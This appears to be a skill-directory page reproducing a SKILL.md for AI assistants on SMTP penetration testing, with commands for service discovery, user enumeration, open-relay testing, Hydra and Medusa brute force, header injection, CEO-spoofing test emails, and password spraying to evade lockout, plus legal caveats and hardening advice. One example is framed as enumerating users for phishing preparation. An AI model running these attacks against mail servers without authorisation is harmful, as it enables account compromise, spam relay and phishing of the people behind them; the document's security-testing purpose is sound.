smtp penetration testing

SMTP Penetration Testing

Safety Notice

This listing is imported from skills.sh public index metadata. Review upstream SKILL.md and repository scripts before running.

Copy this and send it to your AI assistant to learn

Install skill "smtp penetration testing" with this command: npx skills add jpropato/siba/jpropato-siba-smtp-penetration-testing

SMTP Penetration Testing

Purpose

Conduct comprehensive security assessments of SMTP (Simple Mail Transfer Protocol) servers to identify vulnerabilities including open relays, user enumeration, weak authentication, and misconfiguration. This skill covers banner grabbing, user enumeration techniques, relay testing, brute force attacks, and security hardening recommendations.

Prerequisites

Required Tools

Nmap with SMTP scripts

sudo apt-get install nmap

Netcat

sudo apt-get install netcat

Hydra for brute force

sudo apt-get install hydra

SMTP user enumeration tool

sudo apt-get install smtp-user-enum

Metasploit Framework

msfconsole

Required Knowledge

  • SMTP protocol fundamentals

  • Email architecture (MTA, MDA, MUA)

  • DNS and MX records

  • Network protocols

Required Access

  • Target SMTP server IP/hostname

  • Written authorization for testing

  • Wordlists for enumeration and brute force

Outputs and Deliverables

  • SMTP Security Assessment Report - Comprehensive vulnerability findings

  • User Enumeration Results - Valid email addresses discovered

  • Relay Test Results - Open relay status and exploitation potential

  • Remediation Recommendations - Security hardening guidance

Core Workflow

Phase 1: SMTP Architecture Understanding

Components: MTA (transfer) → MDA (delivery) → MUA (client)

Ports: 25 (SMTP), 465 (SMTPS), 587 (submission), 2525 (alternative)

Workflow: Sender MUA → Sender MTA → DNS/MX → Recipient MTA → MDA → Recipient MUA

Phase 2: SMTP Service Discovery

Identify SMTP servers and versions:

Discover SMTP ports

nmap -p 25,465,587,2525 -sV TARGET_IP

Aggressive service detection

nmap -sV -sC -p 25 TARGET_IP

SMTP-specific scripts

nmap --script=smtp-* -p 25 TARGET_IP

Discover MX records for domain

dig MX target.com nslookup -type=mx target.com host -t mx target.com

Phase 3: Banner Grabbing

Retrieve SMTP server information:

Using Telnet

telnet TARGET_IP 25

Response: 220 mail.target.com ESMTP Postfix

Using Netcat

nc TARGET_IP 25

Response: 220 mail.target.com ESMTP

Using Nmap

nmap -sV -p 25 TARGET_IP

Version detection extracts banner info

Manual SMTP commands

EHLO test

Response reveals supported extensions

Parse banner information:

Banner reveals:

  • Server software (Postfix, Sendmail, Exchange)
  • Version information
  • Hostname
  • Supported SMTP extensions (STARTTLS, AUTH, etc.)

Phase 4: SMTP Command Enumeration

Test available SMTP commands:

Connect and test commands

nc TARGET_IP 25

Initial greeting

EHLO attacker.com

Response shows capabilities:

250-mail.target.com 250-PIPELINING 250-SIZE 10240000 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-8BITMIME 250 DSN

Key commands to test:

VRFY - Verify user exists

VRFY admin 250 2.1.5 admin@target.com

EXPN - Expand mailing list

EXPN staff 250 2.1.5 user1@target.com 250 2.1.5 user2@target.com

RCPT TO - Recipient verification

MAIL FROM:<test@attacker.com> RCPT TO:<admin@target.com>

250 OK = user exists

550 = user doesn't exist

Phase 5: User Enumeration

Enumerate valid email addresses:

Using smtp-user-enum with VRFY

smtp-user-enum -M VRFY -U /usr/share/wordlists/users.txt -t TARGET_IP

Using EXPN method

smtp-user-enum -M EXPN -U /usr/share/wordlists/users.txt -t TARGET_IP

Using RCPT method

smtp-user-enum -M RCPT -U /usr/share/wordlists/users.txt -t TARGET_IP

Specify port and domain

smtp-user-enum -M VRFY -U users.txt -t TARGET_IP -p 25 -d target.com

Using Metasploit:

use auxiliary/scanner/smtp/smtp_enum set RHOSTS TARGET_IP set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt set UNIXONLY true run

Using Nmap:

SMTP user enumeration script

nmap --script smtp-enum-users -p 25 TARGET_IP

With custom user list

nmap --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT} -p 25 TARGET_IP

Phase 6: Open Relay Testing

Test for unauthorized email relay:

Using Nmap

nmap -p 25 --script smtp-open-relay TARGET_IP

Manual testing via Telnet

telnet TARGET_IP 25 HELO attacker.com MAIL FROM:<test@attacker.com> RCPT TO:<victim@external-domain.com> DATA Subject: Relay Test This is a test. . QUIT

If accepted (250 OK), server is open relay

Using Metasploit:

use auxiliary/scanner/smtp/smtp_relay set RHOSTS TARGET_IP run

Test variations:

Test different sender/recipient combinations

MAIL FROM:<> MAIL FROM:<test@[attacker_IP]> MAIL FROM:<test@target.com>

RCPT TO:<test@external.com> RCPT TO:<"test@external.com"> RCPT TO:<test%external.com@target.com>

Phase 7: Brute Force Authentication

Test for weak SMTP credentials:

Using Hydra

hydra -l admin -P /usr/share/wordlists/rockyou.txt smtp://TARGET_IP

With specific port and SSL

hydra -l admin -P passwords.txt -s 465 -S TARGET_IP smtp

Multiple users

hydra -L users.txt -P passwords.txt TARGET_IP smtp

Verbose output

hydra -l admin -P passwords.txt smtp://TARGET_IP -V

Using Medusa:

medusa -h TARGET_IP -u admin -P /path/to/passwords.txt -M smtp

Using Metasploit:

use auxiliary/scanner/smtp/smtp_login set RHOSTS TARGET_IP set USER_FILE /path/to/users.txt set PASS_FILE /path/to/passwords.txt set VERBOSE true run

Phase 8: SMTP Command Injection

Test for command injection vulnerabilities:

Header injection test

MAIL FROM:<attacker@test.com> RCPT TO:<victim@target.com> DATA Subject: Test Bcc: hidden@attacker.com X-Injected: malicious-header

Injected content .

Email spoofing test:

Spoofed sender (tests SPF/DKIM protection)

MAIL FROM:<ceo@target.com> RCPT TO:<employee@target.com> DATA From: CEO <ceo@target.com> Subject: Urgent Request Please process this request immediately. .

Phase 9: TLS/SSL Security Testing

Test encryption configuration:

STARTTLS support check

openssl s_client -connect TARGET_IP:25 -starttls smtp

Direct SSL (port 465)

openssl s_client -connect TARGET_IP:465

Cipher enumeration

nmap --script ssl-enum-ciphers -p 25 TARGET_IP

Phase 10: SPF, DKIM, DMARC Analysis

Check email authentication records:

SPF/DKIM/DMARC record lookups

dig TXT target.com | grep spf # SPF dig TXT selector._domainkey.target.com # DKIM dig TXT _dmarc.target.com # DMARC

SPF policy: -all = strict fail, ~all = soft fail, ?all = neutral

Quick Reference

Essential SMTP Commands

Command Purpose Example

HELO Identify client HELO client.com

EHLO Extended HELO EHLO client.com

MAIL FROM Set sender MAIL FROM:<sender@test.com>

RCPT TO Set recipient RCPT TO:<user@target.com>

DATA Start message body DATA

VRFY Verify user VRFY admin

EXPN Expand alias EXPN staff

QUIT End session QUIT

SMTP Response Codes

Code Meaning

220 Service ready

221 Closing connection

250 OK / Requested action completed

354 Start mail input

421 Service not available

450 Mailbox unavailable

550 User unknown / Mailbox not found

553 Mailbox name not allowed

Enumeration Tool Commands

Tool Command

smtp-user-enum smtp-user-enum -M VRFY -U users.txt -t IP

Nmap nmap --script smtp-enum-users -p 25 IP

Metasploit use auxiliary/scanner/smtp/smtp_enum

Netcat nc IP 25 then manual commands

Common Vulnerabilities

Vulnerability Risk Test Method

Open Relay High Relay test with external recipient

User Enumeration Medium VRFY/EXPN/RCPT commands

Banner Disclosure Low Banner grabbing

Weak Auth High Brute force attack

No TLS Medium STARTTLS test

Missing SPF/DKIM Medium DNS record lookup

Constraints and Limitations

Legal Requirements

  • Only test SMTP servers you own or have authorization to test

  • Sending spam or malicious emails is illegal

  • Document all testing activities

  • Do not abuse discovered open relays

Technical Limitations

  • VRFY/EXPN often disabled on modern servers

  • Rate limiting may slow enumeration

  • Some servers respond identically for valid/invalid users

  • Greylisting may delay enumeration responses

Ethical Boundaries

  • Never send actual spam through discovered relays

  • Do not harvest email addresses for malicious use

  • Report open relays to server administrators

  • Use findings only for authorized security improvement

Examples

Example 1: Complete SMTP Assessment

Scenario: Full security assessment of mail server

Step 1: Service discovery

nmap -sV -sC -p 25,465,587 mail.target.com

Step 2: Banner grab

nc mail.target.com 25 EHLO test.com QUIT

Step 3: User enumeration

smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t mail.target.com

Step 4: Open relay test

nmap -p 25 --script smtp-open-relay mail.target.com

Step 5: Authentication test

hydra -l admin -P /usr/share/wordlists/fasttrack.txt smtp://mail.target.com

Step 6: TLS check

openssl s_client -connect mail.target.com:25 -starttls smtp

Step 7: Check email authentication

dig TXT target.com | grep spf dig TXT _dmarc.target.com

Example 2: User Enumeration Attack

Scenario: Enumerate valid users for phishing preparation

Method 1: VRFY

smtp-user-enum -M VRFY -U users.txt -t 192.168.1.100 -p 25

Method 2: RCPT with timing analysis

smtp-user-enum -M RCPT -U users.txt -t 192.168.1.100 -p 25 -d target.com

Method 3: Metasploit

msfconsole use auxiliary/scanner/smtp/smtp_enum set RHOSTS 192.168.1.100 set USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt run

Results show valid users

[+] 192.168.1.100:25 - Found user: admin [+] 192.168.1.100:25 - Found user: root [+] 192.168.1.100:25 - Found user: postmaster

Example 3: Open Relay Exploitation

Scenario: Test and document open relay vulnerability

Test via Telnet

telnet mail.target.com 25 HELO attacker.com MAIL FROM:<test@attacker.com> RCPT TO:<test@gmail.com>

If 250 OK - VULNERABLE

Document with Nmap

nmap -p 25 --script smtp-open-relay --script-args smtp-open-relay.from=test@attacker.com,smtp-open-relay.to=test@external.com mail.target.com

Output:

PORT STATE SERVICE

25/tcp open smtp

|_smtp-open-relay: Server is an open relay (14/16 tests)

Troubleshooting

Issue Cause Solution

Connection Refused Port blocked or closed Check port with nmap; ISP may block port 25; try 587/465; use VPN

VRFY/EXPN Disabled Server hardened Use RCPT TO method; analyze response time/code variations

Brute Force Blocked Rate limiting/lockout Slow down (hydra -W 5 ); use password spraying; check for fail2ban

SSL/TLS Errors Wrong port or protocol Use 465 for SSL, 25/587 for STARTTLS; verify EHLO response

Security Recommendations

For Administrators

  • Disable Open Relay - Require authentication for external delivery

  • Disable VRFY/EXPN - Prevent user enumeration

  • Enforce TLS - Require STARTTLS for all connections

  • Implement SPF/DKIM/DMARC - Prevent email spoofing

  • Rate Limiting - Prevent brute force attacks

  • Account Lockout - Lock accounts after failed attempts

  • Banner Hardening - Minimize server information disclosure

  • Log Monitoring - Alert on suspicious activity

  • Patch Management - Keep SMTP software updated

  • Access Controls - Restrict SMTP to authorized IPs

Source Transparency

This detail page is rendered from real SKILL.md content. Trust labels are metadata-based hints, not a safety guarantee.

Open in GitHubOpen in ClawHub

Related Skills

Related by shared tags or category signals.

General

dokploy-deploy

No summary provided by upstream source.

Repository SourceNeeds Review
-46
jpropato
General

bauman-design-system

No summary provided by upstream source.

Repository SourceNeeds Review
-13
jpropato
General

react-best-practices

No summary provided by upstream source.

Repository SourceNeeds Review
-11
jpropato